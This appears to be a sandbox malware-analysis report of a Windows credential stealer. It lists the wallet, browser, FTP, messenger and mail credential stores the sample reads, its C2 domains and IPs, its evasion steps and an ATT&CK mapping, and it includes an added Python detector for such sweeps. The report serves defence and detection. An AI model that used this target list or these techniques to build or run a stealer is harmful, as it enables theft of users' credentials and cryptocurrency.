              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\System32\FXSSVC.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\FXSSVC.exe | Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST4BB8.tmp VolumeInformation
              Source: C:\Windows\System32\FXSSVC.exe | Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST4D9D.tmp VolumeInformation
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\msdtc.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\Locator.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\SensorDataService.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\snmptrap.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\Spectrum.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\TieringEngineService.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\AgentService.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\vds.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\wbengine.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\TieringEngineService.exe | Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_02C48550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,wsprintfW,8_2_02C48550
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00417098 GetTimeZoneInformation,8_2_00417098
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00404C15 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,8_2_00404C15
              Source: C:\Users\user\Desktop\MUH030425.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000002.1691032810.0000000003BED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.1691032810.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.1600484490.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.1603192431.0000000003330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.1609934065.00000000051FB000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.1691032810.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2024, type: MEMORYSTR
              Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000002.1691032810.0000000003BED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.1691032810.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.1600484490.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.1691032810.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2024, type: MEMORYSTR
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Electrum\wallets\
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Electrum\wallets\
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: %APPDATA%\Exodus\
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: %APPDATA%\Ethereum\keystore\
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: %APPDATA%\Exodus\
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: %APPDATA%\Ethereum\keystore\
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: %APPDATA%\Ethereum\keystore\
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Electrum-LTC\wallets\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xmlJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\ElectrumG\wallets\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-btcp\wallets\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus Eden\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
              Source: Yara matchFile source: 8.2.RegSvcs.exe.4f5999a.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.RegSvcs.exe.4ecc25c.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.RegSvcs.exe.4eee249.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1605184982.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2024, type: MEMORYSTR
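The "File opened" and "Key opened" rows above are the artefacts a stealer sweeps in one pass: wallet directories, the Chrome Login Data database, FileZilla and WinSCP session stores, the Pidgin (.purple) accounts file and the Outlook profile key, all read by RegSvcs.exe, a .NET utility with no legitimate reason to touch any of them. The following Python is an added example, not part of the Joe Sandbox report, that turns that evidence into a detection rule: it groups the exact paths and keys listed above into categories and flags any single process that reaches into three or more of them. The event line format (pid|image|kind|target), the sample events, the category grouping and the threshold of three are the example's own assumptions.

```python
from collections import defaultdict

# Categories of secret stores, built from the "File opened" / "Key opened"
# evidence in the report. Kept in forward-slash, lower-case form; events are
# normalised the same way, so both \ and / spellings match. The grouping into
# categories is an assumption of this example, not something the report states.
TARGETS = {
    "crypto-wallet": [
        "/appdata/roaming/electrum/wallets/",
        "/appdata/roaming/electrum-ltc/wallets/",
        "/appdata/roaming/electrumg/wallets/",
        "/appdata/roaming/electrum-btcp/wallets/",
        "/appdata/roaming/exodus/",
        "/appdata/roaming/exodus eden/",
        "/appdata/roaming/jaxx/local storage/",
        "/appdata/roaming/ethereum/keystore/",
        "hkey_current_user/software/monero-project/monero-core",
        "hkey_current_user/software/bitcoin/bitcoin-qt",
    ],
    "browser-credentials": [
        "/appdata/local/google/chrome/user data/default/login data",
    ],
    "ftp-sessions": [
        "/appdata/roaming/filezilla/recentservers.xml",
        "hkey_current_user/software/martin prikryl/winscp 2/sessions",
    ],
    "im-accounts": ["/appdata/roaming/.purple/accounts.xml"],
    "mail-profile": [
        "hkey_current_user/software/microsoft/windows nt/currentversion/"
        "windows messaging subsystem/profiles/outlook",
    ],
}


def normalise(target: str) -> str:
    """Lower-case and forward-slash a file path or registry key path."""
    return target.replace("\\", "/").lower()


def classify(target: str):
    """Return the secret-store category a path or key falls into, or None."""
    t = normalise(target)
    for category, fragments in TARGETS.items():
        if any(fragment in t for fragment in fragments):
            return category
    return None


def parse_event(line: str):
    """Parse one constructed event line of the form 'pid|image|kind|target'."""
    pid, image, kind, target = line.rstrip("\n").split("|", 3)
    return int(pid), image, kind, target


def find_stealer_sweeps(lines, min_categories: int = 3):
    """Flag processes that touch secret stores from >= min_categories categories.

    Breadth is the signal: chrome.exe reading its own Login Data is one
    category, whereas RegSvcs.exe PID 2024 in the report reads wallets, the
    browser store, FTP sessions, IM accounts and the mail profile in one run.
    """
    hits = defaultdict(lambda: {"image": None, "categories": set(), "targets": []})
    for line in lines:
        if not line.strip():
            continue
        pid, image, _kind, target = parse_event(line)
        category = classify(target)
        if category is None:
            continue
        rec = hits[pid]
        rec["image"] = image
        rec["categories"].add(category)
        rec["targets"].append(target)
    return {pid: rec for pid, rec in hits.items() if len(rec["categories"]) >= min_categories}


# Constructed sample events (not taken from the report). PID 2024 mirrors the
# RegSvcs.exe accesses listed above; the other PIDs are benign single-app access.
SAMPLE_EVENTS = """\
2024|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe|KEY|HKEY_CURRENT_USER\\Software\\Bitcoin\\Bitcoin-Qt
2024|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe|KEY|HKEY_CURRENT_USER\\Software\\Martin Prikryl\\WinSCP 2\\Sessions\\
2024|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe|FILE|C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data
2024|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe|FILE|C:\\Users\\user\\AppData\\Roaming\\Exodus\\
2024|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe|FILE|C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml
2024|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe|KEY|HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook
5120|C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|FILE|C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data
6631|C:\\Program Files\\FileZilla FTP Client\\filezilla.exe|FILE|C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml
7000|C:\\Windows\\System32\\notepad.exe|FILE|C:\\Users\\user\\Documents\\notes.txt
""".splitlines()

if __name__ == "__main__":
    for pid, rec in find_stealer_sweeps(SAMPLE_EVENTS).items():
        print(f"PID {pid} {rec['image']}: {sorted(rec['categories'])}")
```

Only PID 2024 crosses the threshold; the browser and FTP client each hit a single category and stay silent. In a real pipeline the event lines would come from file and registry access telemetry (EDR or Sysmon style events), and the image path gives a second, cheaper check: none of these stores should ever be read by RegSvcs.exe or any other process living under the .NET Framework directory.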
MITRE ATT&CK Matrix (one line per tactic column; a number preceding a technique is the count badge shown on the matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 2 Native API; 1 Scheduled Task/Job; 2 Service Execution; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 2 LSASS Driver; 1 DLL Side-Loading; 1 Windows Service; 1 Scheduled Task/Job; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 Abuse Elevation Control Mechanism; 2 LSASS Driver; 1 DLL Side-Loading; 1 Windows Service; 11 Process Injection; 1 Scheduled Task/Job; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 12 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 322 Masquerading; 31 Virtualization/Sandbox Evasion; 11 Process Injection
Credential Access: 2 OS Credential Dumping; 2 Credentials in Registry; 1 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 11 System Time Discovery; 1 Account Discovery; 3 File and Directory Discovery; 35 System Information Discovery; 121 Security Software Discovery; 31 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery; Network Service Discovery
Lateral Movement: 1 Taint Shared Content; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 1 Archive Collected Data; 4 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 4 Ingress Tool Transfer; 2 Encrypted Channel; 4 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph (ID: 1628929; Sample: MUH030425.exe; Start date: 04/03/2025; Architecture: WINDOWS; Score: 100)

Sample (top node)
• Contacted: ww7.przvgke.biz; ww7.fwiwk.biz; 88 other IPs or domains
• Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures
• Started: alg.exe; MUH030425.exe; TieringEngineService.exe; 20 other processes

alg.exe
• Contacted: dlynankz.biz (85.214.228.140, ports 49781, 80, STRATOSTRATOAGDE, Germany); gjogvvpsf.biz (208.117.43.225, ports 49755, 49763, 49805, STEADFASTUS, United States); 11 other IPs or domains
• Dropped: C:\Program Files\...\updater.exe (PE32+); C:\Program Files\...\private_browsing.exe (PE32+); C:\Program Files\...\plugin-container.exe (PE32+); 131 other malicious files
• Signatures: Creates files in the system32 config directory; Drops executable to a common third party application directory; Infects executable files (exe, dll, sys, html)

MUH030425.exe
• Dropped: C:\Users\user\AppData\Roaming\wBBaygjR.exe (PE32); C:\Users\user\AppData\Local\...\tmpD1E0.tmp (XML); C:\Users\user\AppData\...\MUH030425.exe.log (ASCII)
• Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender
• Started: RegSvcs.exe; powershell.exe; powershell.exe; 2 other processes

TieringEngineService.exe
• Signatures: Creates files inside the volume driver (system volume information); Contains functionality to behave differently if execute on a Russian/Kazak computer

20 other processes (started by the sample)
• Signatures: Found direct / indirect Syscall (likely to bypass EDR)

RegSvcs.exe (started by MUH030425.exe)
• Contacted: k1d5.icu (104.21.96.1, ports 49707, 49722, 80, CLOUDFLARENETUS, United States); fwiwk.biz (72.52.178.23, ports 49715, 49719, 49749, LIQUIDWEBUS, United States); 6 other IPs or domains
• Dropped: C:\Windows\System32\wbengine.exe (PE32+); C:\Windows\System32\wbem\WmiApSrv.exe (PE32+); C:\Windows\System32\vds.exe (PE32+); 81 other malicious files
• Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access); 7 other signatures
• Started: cmd.exe

powershell.exe (first instance, started by MUH030425.exe)
• Signatures: Loading BitLocker PowerShell Module
• Started: conhost.exe; WmiPrvSE.exe

powershell.exe (second instance, started by MUH030425.exe)
• Started: conhost.exe

2 other processes (started by MUH030425.exe)
• Dropped: C:\ProgramData\Microsoft\...\Report.wer (Unicode)
• Started: conhost.exe

cmd.exe (started by RegSvcs.exe)
• Started: conhost.exe; timeout.exe
